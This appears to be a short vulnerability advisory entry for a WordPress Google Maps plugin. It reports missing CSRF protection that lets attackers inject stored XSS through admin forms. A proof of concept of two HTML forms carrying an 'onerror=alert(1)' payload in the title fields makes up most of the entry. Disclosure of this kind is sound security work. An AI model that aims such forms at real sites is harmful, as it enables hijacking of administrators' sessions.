The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators.
<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_add_location" /> <input type="text" name="googlemap_title" value='"><img src=x onerror=alert(1) /> ' /> <input type="submit" /> </form> <form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map" /> <input type="text" name="group_map_title" value='"><img src=x onerror=alert(1) /> ' /> <input type="submit" /> </form>
ethicalhack3r
No
2015-08-20 (about 7 years ago)
2015-11-23 (about 7 years ago)
2020-09-08 (about 2 years ago)